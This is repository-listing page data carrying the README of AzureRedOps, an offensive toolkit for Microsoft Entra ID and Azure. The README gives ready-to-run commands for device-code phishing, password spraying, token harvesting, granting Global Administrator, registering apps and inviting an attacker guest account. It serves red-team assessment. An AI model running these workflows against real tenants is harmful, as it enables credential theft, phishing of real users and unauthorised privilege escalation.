[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-83129":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":15,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":16,"compositeScore":17,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},83129,"AzureRedOps","Mr-Un1k0d3r\u002FAzureRedOps","Mr-Un1k0d3r","Azure RedOps is an offensive security toolkit for assessing the security posture of Microsoft Entra ID",null,"Python",149,15,69,0,80,4,68.61,false,"main",true,[],"2026-06-12 04:01:40","# AzureRedOps\n\n> A Swiss Army tool for Azure \u002F Entra ID red teaming.\n\n**Author:** Mr.Un1k0d3r ([TrueCyber Inc](https:\u002F\u002Ftruecyber.world))\n**Version:** 0.1\n**Language:** Python 3.12+\n\n---\n\n## Overview\n\nAzureRedOps is an offensive security toolkit for assessing the security\nposture of **Microsoft Entra ID and Azure** tenants. It wraps the most common\nred-team workflows — authentication, token management, directory enumeration,\nprivilege checking, password spraying, and post-exploitation actions against\n**Microsoft Graph** — behind one consistent `--activity` driven CLI.\n\nEvery operation is selected with `-a\u002F--activity`. Tokens obtained during\nauthentication can be cached locally (`.azure_creds`) and reused by name with\n`-l\u002F--load-access-token`, so you rarely have to paste raw JWTs.\n\n### Features\n\n- **Token management** — save, list, decode\u002Fview, and delete access\u002Frefresh tokens in a local credential store (`.azure_creds`). 
Any flow can persist its tokens automatically with `-s\u002F--save` + `-n\u002F--name`.\n- **Multiple authentication flows:**\n  - **ROPC** (`auth`) — direct username\u002Fpassword authentication.\n  - **Device-code phishing** (`phish-start` \u002F `phish-capture`) — abuse the OAuth device authorization grant to capture tokens issued when a target enters your user code at `microsoft.com\u002Fdevicelogin`. Auto-captures by default.\n  - **Third-party app consent** (`auth-app`) — full Authorization Code + PKCE flow against a custom application registration, served by a built-in local HTTPS listener that receives the redirect.\n  - **Interactive browser capture** (`auth-interactive`) — drive a real Chromium browser with Playwright (handles MFA \u002F Conditional Access \u002F SSO), then harvest every token from the recorded session HAR.\n  - **Refresh-token exchange** (`refresh`) — trade a refresh token for fresh access tokens.\n- **Directory enumeration** via Microsoft Graph — users, applications, service principals, authorization policies, and a bulk `gather-all` collector.\n- **Password spraying** against known Microsoft first-party app IDs (`spray`) and cross-app refresh-token spraying (`spray-refresh`).\n- **Post-exploitation** — register applications, create groups, assign directory roles, invite external (guest) users, and upload files to OneDrive.\n- **Recon helpers** — `magic-app` finds publicly-redirectable apps with `AllPrincipals` consent; built-in lists of known\u002Finteresting Microsoft app IDs.\n- **Quality-of-life** — beta-endpoint switch, custom headers, custom user-agent\u002Fscope\u002Faudience, attribute filtering, expanded output, debug\u002Fverbose-HTTP logging, and output redirection to a file.\n\n---\n\n## Requirements\n\n- Python **3.12 or newer** (the code relies on PEP 701 f-string syntax).\n- Python packages (see `requirements.txt`):\n  - `PyJWT`\n  - `requests`\n  - `playwright`\n- A browser runtime for Playwright (only needed for the 
`auth-interactive` activity).\n- TLS certificate + key at `includes\u002Fweb\u002Fcert.pem` and `includes\u002Fweb\u002Fkey.pem`\n  (only needed for the `auth-app` PKCE flow — see [Notes](#notes--tips)).\n\n---\n\n## Installation\n\n```bash\n# Clone the repository\ngit clone \u003Cyour-fork-url> AzureRedOps\ncd AzureRedOps\n\n# Create and activate a virtual environment\npython3 -m venv AzureRedOps\nsource AzureRedOps\u002Fbin\u002Factivate          # Linux \u002F macOS\n# .\\AzureRedOps\\Scripts\\Activate.ps1     # Windows PowerShell\n\n# Install dependencies\npip install -r requirements.txt\n\n# Install the browser used by auth-interactive (one-time)\npython -m playwright install chromium\n```\n\nRun the tool:\n\n```bash\npython3 AzureRedOps.py -a \u003Cactivity> [options]\n```\n\n---\n\n## Usage\n\nThe general invocation pattern is:\n\n```bash\npython3 AzureRedOps.py -a \u003Cactivity> [authentication] [activity options] [global options]\n```\n\n### Providing a token\n\nActivities that call Microsoft Graph need an access token. You can supply it two ways:\n\n| Method | Flag | Example |\n|--------|------|---------|\n| Pass a raw token | `-ac, --access-token` | `-ac eyJ0eXAi...` |\n| Load a cached token by name | `-l, --load-access-token` | `-l mytoken` |\n\nWhen `-l` is used, the matching `access_token` (and, where relevant, `refresh_token`\nand `tenant`) is read from the `.azure_creds` store.\n\n### Saving tokens to a file (`-s` \u002F `-n`)\n\nAny activity that obtains tokens (`auth`, `auth-app`, `auth-interactive`,\n`phish-start`\u002F`phish-capture`, `refresh`) can **automatically persist them** to the\nlocal credential store (`.azure_creds`) by adding `-s\u002F--save` together with\n`-n\u002F--name`:\n\n```bash\n# Authenticate and save the resulting tokens under the name \"victim1\"\npython3 AzureRedOps.py -a auth -u user@contoso.com -p 'P@ssw0rd!' 
-tid \u003Ctenant-guid> -s -n victim1\n```\n\n- `-s\u002F--save` turns on auto-save; **it requires `-n\u002F--name`** — the tool exits with an\n  error if `-n` is missing.\n- `-n\u002F--name` is the key the token is stored under. You can later reuse it with\n  `-l victim1` instead of pasting the raw JWT, view it with `-a view -n victim1`, or\n  delete it with `-a delete -n victim1`.\n- The `auth-interactive` activity always auto-saves and will prompt you for a name\n  interactively if `-n` is not supplied.\n\n### Saving activity output to a file (`-j`)\n\nMost enumeration activities (`list-users`, `list-applications`, `list-principals`,\n`gather-all`, `raw-url`) accept `-j\u002F--json \u003Cfilename>` to write the raw API response\nto a JSON file instead of (or in addition to) printing it:\n\n```bash\n# Dump every user to users.json\npython3 AzureRedOps.py -a list-users -l victim1 -j users.json\n```\n\nFor `gather-all`, the supplied filename is used as a suffix and one file is written\nper Graph endpoint (e.g. `users-\u003Cname>`, `groups-\u003Cname>`, ...).\n\n> Tip: `-j` controls structured JSON export, while `-re\u002F--redirect-to-file` mirrors\n> the formatted console output to `output.txt`. The two are independent.\n\n### Tenant identifiers\n\n- `-t, --tenant` expects a **domain name** (e.g. `contoso.com`) and is used by the `id` activity.\n- `-tid, --tenant-id` expects a **tenant GUID** or `common`, used by the authentication activities.\n\n---\n\n## Command-Line Options\n\n| Short | Long | Default | Description |\n|-------|------|---------|-------------|\n| `-a` | `--activity` | `id` | **(required)** Activity to perform (see [Activities](#activities)). |\n| `-ac` | `--access-token` | | Azure access token. |\n| `-n` | `--name` | | Name used to save\u002Fload a token, or display name for `register-app`\u002F`new-group`\u002F`invite`. |\n| `-t` | `--tenant` | | Azure tenant **domain** name (used by `id`). 
|\n| `-c` | `--devicecode` | | Device code (used by `phish-capture`). |\n| `-tid` | `--tenant-id` | | Azure tenant **ID** (GUID) or `common`. |\n| `-app` | `--appid` | `d3590ed6-52b3-4102-aeff-aad2292ab01c` | Application (client) ID. |\n| `-e` | `--endpoint` | `microsoftonline.com` | Login endpoint domain to target. |\n| `-r` | `--refresh-token` | | Authentication refresh token. |\n| `-as` | `--auto-start` | `True` | Automatically start device-code capture after `phish-start`. |\n| `-l` | `--load-access-token` | | Load a cached token by name from `.azure_creds`. |\n| `-j` | `--json` | | Save activity output to the given JSON file. |\n| `-fl` | `--filter` | | Only print attributes whose key matches one of these (comma-separated). |\n| `-u` | `--username` | | User principal name (email). |\n| `-p` | `--password` | | User password. |\n| `-s` | `--save` | `False` | Auto-save obtained tokens to `.azure_creds` (**requires `-n`**). |\n| `-cp` | `--check-privileges` | `False` | After a successful spray login, probe whether users\u002Fapps can be enumerated. |\n| `-uid` | `--uid` | | Azure user object ID (used by `add-group`). |\n| `-headers` | `--headers` | | Extra HTTP headers as JSON, e.g. `{\"X-Foo\": \"bar\"}`. |\n| `-gid` | `--gid` | `62e90394-69f5-4237-91f9-056ad24d70a7` | Directory role \u002F group ID (default = **Global Administrator**). |\n| `-i` | `--id` | `False` | For `interest`: print only the application IDs. |\n| `-ty` | `--type` | | For `interest`: filter to a specific category. |\n| `-fp` | `--filepath` | | File to upload (`push-file`) or custom app list for spraying. |\n| `-v` | `--version` | `v2.0` | Authentication API version: `v0` or `v2.0`. |\n| `-ua` | `--user-agent` | *(Chrome UA string)* | Override the HTTP `User-Agent`. |\n| `-au` | `--audience` | `https:\u002F\u002Fgraph.microsoft.com` | Token audience\u002Fresource. |\n| `-sc` | `--scope` | `openid offline_access` | OAuth2 scope. 
Use `https:\u002F\u002Fgraph.microsoft.com\u002F.default` for Graph, `openid` for spraying. |\n| `-url` | `--url` | | Target URL for `raw-url`\u002F`invite`; comma-separated list of URLs for `auth-interactive`. |\n| `-beta` | `--beta` | `False` | Use the Microsoft Graph **beta** endpoint for `list-users`\u002F`list-applications`. |\n| `-exp` | `--expand` | `False` | Expand nested lists\u002Fdicts in output to a human-readable format. |\n| `-k` | `--keep` | `False` | Keep the `session.har` file after `auth-interactive`. |\n| `-d` | `--debug` | `False` | Enable debug logging. |\n| `-dd` | `--verbose-debug` | `False` | Enable verbose HTTP request\u002Fresponse logging. |\n| `-re` | `--redirect-to-file` | `False` | Mirror all console output to `output.txt`. |\n\n---\n\n## Activities\n\nBelow, each activity lists its **required** and *optional* arguments.\n\"Token\" means either `-ac` or `-l` is required.\n\n### Token Management\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `save` | `-ac`, `-n` | `-tid`, `-r` | Save an access (and optional refresh) token to `.azure_creds`. |\n| `list-token` | — | — | List the names of all saved tokens. |\n| `view` | `-n` | — | Decode and display the JWT claims of a saved token. |\n| `delete` | `-n` | — | Remove a saved token from the store. |\n\n```bash\n# Save a token under the name \"mytoken\"\npython3 AzureRedOps.py -a save -n mytoken -ac eyJ0eXAi... -r 0.AReAB... -tid \u003Ctenant-guid>\n\n# List, view, delete\npython3 AzureRedOps.py -a list-token\npython3 AzureRedOps.py -a view -n mytoken\npython3 AzureRedOps.py -a delete -n mytoken\n```\n\n### Tenant Discovery & Authentication\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `id` | `-t` | — | Resolve the tenant ID for a given email domain. 
|\n| `phish-start` | — | `-app`, `-tid`, `-as`, `-s`, `-n` | Begin a device-code flow; prints the user code and (by default) auto-captures. |\n| `phish-capture` | `-c` | `-app`, `-tid`, `-s`, `-n` | Poll for tokens using a previously issued device code. |\n| `auth` | `-u`, `-p`, `-tid`, `-app`, `-v` | `-s`, `-n` | Authenticate with username\u002Fpassword (ROPC). |\n| `auth-app` | `-tid` | `-s`, `-n` | Authorization-Code + PKCE flow via a local HTTPS listener. |\n| `auth-interactive` | — | `-url`, `-k`, `-n` | Spawn a browser (Playwright), let the user log in, and harvest tokens from the session HAR. Always auto-saves. |\n| `refresh` | `-v`, `-app`, and (`-l`) **or** (`-r` + `-tid`) | `-s`, `-n` | Exchange a refresh token for a fresh access token. |\n\n```bash\n# Resolve a tenant ID from a domain\npython3 AzureRedOps.py -a id -t contoso.com\n\n# Device-code phishing (auto-capture is on by default)\npython3 AzureRedOps.py -a phish-start -tid common -app d3590ed6-52b3-4102-aeff-aad2292ab01c\n\n# Capture later with a previously issued device code\npython3 AzureRedOps.py -a phish-capture -c \u003Cdevice-code> -tid common\n\n# Username \u002F password (ROPC)\npython3 AzureRedOps.py -a auth -u user@contoso.com -p 'P@ssw0rd!' -tid \u003Ctenant-guid>\n\n# Interactive browser capture, saving tokens automatically\npython3 AzureRedOps.py -a auth-interactive -url https:\u002F\u002Fportal.azure.com -s -n harvested\n\n# Refresh a saved token\npython3 AzureRedOps.py -a refresh -l mytoken -app d3590ed6-52b3-4102-aeff-aad2292ab01c\n```\n\n#### How the authentication flows work\n\nAzureRedOps implements several distinct ways of obtaining tokens. 
Pick the one that\nmatches your engagement; all of them honour `-s\u002F-n` for auto-saving the result.\n\n##### Device-code phishing (`phish-start` \u002F `phish-capture`)\n\nThe OAuth 2.0 **device authorization grant** is designed for input-constrained\ndevices, which makes it a powerful phishing primitive: you request a code on behalf of\na first-party Microsoft application, then socially-engineer a target into entering that\ncode at `https:\u002F\u002Fmicrosoft.com\u002Fdevicelogin` while signed into their account. Once they\ndo, the tokens are issued **to you**.\n\n- `phish-start` requests a device code and prints the **user code**, the login URL,\n  and the raw **device code**. Because `-as\u002F--auto-start` defaults to `True`, it then\n  immediately begins polling for the token — so simply running `phish-start` and\n  handing the user code to the target is usually all you need.\n- `phish-capture` is the manual counterpart: feed it a device code you obtained earlier\n  with `-c\u002F--devicecode` and it polls the token endpoint until the victim completes the\n  login (the tool silently retries while authorization is pending).\n- Use `-app\u002F--appid` to impersonate a specific first-party client and `-tid\u002F--tenant-id`\n  to scope to a tenant (`common` by default). Tip: set the scope to\n  `'https:\u002F\u002Fgraph.microsoft.com\u002F.default offline_access openid'` to get a Graph-ready\n  token with a refresh token.\n\n```bash\n# Start a device-code session (auto-captures the token once the victim logs in)\npython3 AzureRedOps.py -a phish-start -tid common -s -n phished\n\n# Or capture against a code you generated separately\npython3 AzureRedOps.py -a phish-capture -c \u003Cdevice-code> -tid common -s -n phished\n```\n\n##### Third-party application consent (`auth-app`)\n\n`auth-app` performs a full **Authorization Code flow with PKCE** against a third-party\n(non-default) application registration. 
The tool spins up a local **HTTPS listener**\n(`includes\u002FWebserver.py`, on `https:\u002F\u002Flocalhost:2342`) that acts as the OAuth redirect\nURI, generates the PKCE `code_verifier`\u002F`code_challenge` pair, and prints an\nauthorization URL for you to open in a browser. After you consent, Azure redirects the\nauthorization code back to the local listener, which the tool then exchanges for tokens.\n\nThis is the flow to use when you control (or have registered) an application and want to\ndrive consent through a real browser session — useful for illicit-consent style\nscenarios or when ROPC is blocked.\n\n- Requires a TLS certificate\u002Fkey pair at `includes\u002Fweb\u002Fcert.pem` and\n  `includes\u002Fweb\u002Fkey.pem` (see [Notes](#notes--tips) for how to generate them).\n- The default client ID for this flow is `8545b2fc-a69c-4851-9206-0f74a519fe5f`.\n\n```bash\npython3 AzureRedOps.py -a auth-app -tid \u003Ctenant-guid> -s -n consented\n```\n\n##### Interactive browser authentication (`auth-interactive`)\n\n`auth-interactive` launches a **real Chromium browser via Playwright** and lets the\noperator (or a target on a shared session) complete an interactive login — including\nMFA, Conditional Access, and federated\u002FSSO redirects that scripted flows cannot\nsatisfy. The entire browser session is recorded to a HAR file (`session.har`); the tool\nthen parses that capture, extracts **every** access\u002Frefresh token pair seen on the\n`\u002Foauth2\u002Fv2.0\u002Ftoken` endpoint, decodes each JWT, and lets you choose which one(s) to\nsave.\n\n- `-url\u002F--url` sets the page(s) to navigate to after the login page loads. It accepts a\n  **comma-separated list** of URLs (e.g. `https:\u002F\u002Fportal.azure.com,https:\u002F\u002Foutlook.office.com`)\n  so you can collect tokens for multiple resources in one session. 
Defaults to\n  `https:\u002F\u002Fportal.azure.com`.\n- This activity **always auto-saves**: after harvesting, it prompts for which token\n  index(es) to keep and a name to store them under.\n- Add `-k\u002F--keep` to preserve `session.har` for offline analysis (it is deleted by\n  default).\n\n```bash\n# Log in interactively and harvest tokens for two resources\npython3 AzureRedOps.py -a auth-interactive -url https:\u002F\u002Fportal.azure.com,https:\u002F\u002Foutlook.office.com -k\n```\n\n### Microsoft Graph Operations\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `self` | Token | — | Display the current user's profile (`\u002Fme`). |\n| `email` | Token, `-fl` | — | Search the signed-in user's mailbox for a keyword. |\n| `permission` | Token | — | Show the tenant authorization policy (beta). |\n| `list-users` | Token | `-j`, `-beta`, `-fl`, `-exp` | Enumerate all users. |\n| `list-applications` | Token | `-j`, `-beta`, `-fl`, `-exp` | Enumerate all applications. |\n| `list-principals` | Token | `-j`, `-fl`, `-exp` | Enumerate all service principals. |\n| `register-app` | Token, `-n` | — | Register a new application (with a 1-year client secret). |\n| `new-group` | Token, `-n` | — | Create a new security group. |\n| `add-group` | Token, `-uid` | `-gid` | Assign a directory role to a principal (default role = Global Admin). |\n| `push-file` | Token, `-fp`, `-n` | — | Upload a local file to the user's OneDrive. |\n| `gather-all` | Token | `-j` | Bulk-collect users, groups, apps, SPs, roles, policies, and grants. |\n| `raw-url` | Token, `-url` | `-j`, `-fl`, `-exp` | Issue a raw GET to any Graph\u002FREST URL (handles `@odata.nextLink` paging). |\n| `invite` | Token, `-n` | `-url` | Invite an external (guest) user. `-n` is the invitee's email. |\n| `magic-app` | Token | — | Find apps with `AllPrincipals` consent, `appRoleAssignmentRequired=false`, and public redirect URIs. 
|\n\n```bash\n# Who am I?\npython3 AzureRedOps.py -a self -l mytoken\n\n# Enumerate users (beta endpoint, save to JSON, only show some fields)\npython3 AzureRedOps.py -a list-users -l mytoken -beta -j users.json -fl displayName,userPrincipalName\n\n# Register an application\npython3 AzureRedOps.py -a register-app -n EvilApp -l mytoken\n\n# Assign Global Admin to a user\npython3 AzureRedOps.py -a add-group -uid \u003Cuser-object-id> -l mytoken\n\n# Upload a file to OneDrive\npython3 AzureRedOps.py -a push-file -fp .\u002Fpayload.docx -n payload.docx -l mytoken\n\n# Query an arbitrary Graph URL\npython3 AzureRedOps.py -a raw-url -url \"https:\u002F\u002Fgraph.microsoft.com\u002Fbeta\u002Fusers\" -l mytoken\n\n# Invite an external user\npython3 AzureRedOps.py -a invite -n attacker@evil.com -url https:\u002F\u002Fexample.com\u002Finvite -l mytoken\n\n# Hunt for exploitable public apps\npython3 AzureRedOps.py -a magic-app -l mytoken\n```\n\n### Password Spraying\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `spray` | `-u`, `-p`, `-tid` | `-fp`, `-cp` | Spray credentials against known first-party app IDs (v0 + v2.0 APIs). |\n| `spray-refresh` | `-v`, and (`-l`) **or** (`-r` + `-tid`) | `-fp`, `-cp` | Replay a refresh token across many app IDs. |\n\nBy default both activities use `includes\u002Fauth_apps.json` as the app source; override\nwith `-fp`. Add `-cp` to test whether each successful login can enumerate users\u002Fapps.\n\n```bash\n# Spray a single credential across first-party apps\npython3 AzureRedOps.py -a spray -u user@contoso.com -p 'P@ssw0rd!' 
-tid \u003Ctenant-guid> -cp\n\n# Cross-app refresh spraying from a saved token\npython3 AzureRedOps.py -a spray-refresh -l mytoken -v v2.0\n```\n\n### Intelligence & Discovery\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `knownids` | — | `-fl`, `-exp` | List known Microsoft application IDs (`includes\u002Fapps.json`). |\n| `list-interest` | — | — | List the app categories defined in `includes\u002Fauth_apps.json`. |\n| `interest` | — | `-i`, `-ty` | List interesting app IDs; `-i` prints IDs only, `-ty` filters by category. |\n\n```bash\npython3 AzureRedOps.py -a knownids\npython3 AzureRedOps.py -a list-interest\npython3 AzureRedOps.py -a interest -ty all_users\npython3 AzureRedOps.py -a interest -i          # IDs only\n```\n\n---\n\n## Output & Generated Files\n\n| File | Created by | Description |\n|------|-----------|-------------|\n| `.azure_creds` | Token-saving activities | Local JSON cache of access\u002Frefresh tokens, keyed by name. |\n| `output.txt` | `-re` flag | Timestamped mirror of all console output. |\n| `session.har` | `auth-interactive` | Browser session recording (deleted unless `-k` is set). |\n| `\u003Cname>.json` | `-j` flag \u002F `gather-all` | Saved API responses. |\n\n### Bundled data files\n\n| File | Description |\n|------|-------------|\n| `includes\u002Fauth_apps.json` | Target application IDs used for spraying and the `interest` lists. |\n| `includes\u002Fapps.json` | Known Microsoft app IDs and metadata for `knownids`. |\n| `includes\u002FWebserver.py` | Local HTTPS listener implementing the PKCE redirect for `auth-app`. |\n| `includes\u002Fweb\u002Fcert.pem`, `includes\u002Fweb\u002Fkey.pem` | TLS material for the local listener. |\n\n---\n\n## Notes & Tips\n\n- **Default app ID** (`d3590ed6-52b3-4102-aeff-aad2292ab01c`) is the Microsoft Office\n  first-party client, which works for most flows. 
The hints printed by some activities\n  suggest extending tokens to the **Microsoft Azure CLI** app (`04b07795-8ddb-461a-bbee-02f9e1bf7b46`)\n  for broader access.\n- **Scope guidance:** use `-sc openid` for password spraying and\n  `-sc 'https:\u002F\u002Fgraph.microsoft.com\u002F.default'` for Graph operations.\n- **`--beta`** switches `list-users` \u002F `list-applications` to the Graph beta endpoint,\n  which can surface extra information (e.g. on-prem sync attributes).\n- **`auth-app` TLS:** the local PKCE listener requires a certificate\u002Fkey pair at\n  `includes\u002Fweb\u002Fcert.pem` and `includes\u002Fweb\u002Fkey.pem`. Generate a self-signed pair if\n  they are missing, e.g.:\n  ```bash\n  openssl req -x509 -newkey rsa:2048 -nodes \\\n    -keyout includes\u002Fweb\u002Fkey.pem -out includes\u002Fweb\u002Fcert.pem -days 365 -subj \"\u002FCN=localhost\"\n  ```\n- **Debugging:** `-d` prints high-level debug info; `-dd` dumps full HTTP requests and\n  responses (headers + bodies) — useful when diagnosing failed token exchanges.\n\n---\n\n## Credits\n\nCreated by **Mr.Un1k0d3r** — TrueCyber Inc.\n","AzureRedOps 是一个针对 Microsoft Entra ID 和 Azure 租户进行安全评估的进攻性安全工具包。其核心功能包括多种认证流程（如ROPC、设备代码钓鱼等）、令牌管理、目录枚举、密码喷洒攻击以及后渗透操作，所有这些都通过一个统一的命令行界面实现。该工具使用Python 3.12+编写，支持保存和重用访问令牌，简化了红队活动中的重复性任务。AzureRedOps适用于需要对Azure环境进行全面安全测试与漏洞发现的专业场景，特别是对于那些希望深入了解自身云基础设施潜在弱点的安全团队而言非常有用。",2,"2026-06-11 04:10:12","CREATED_QUERY"]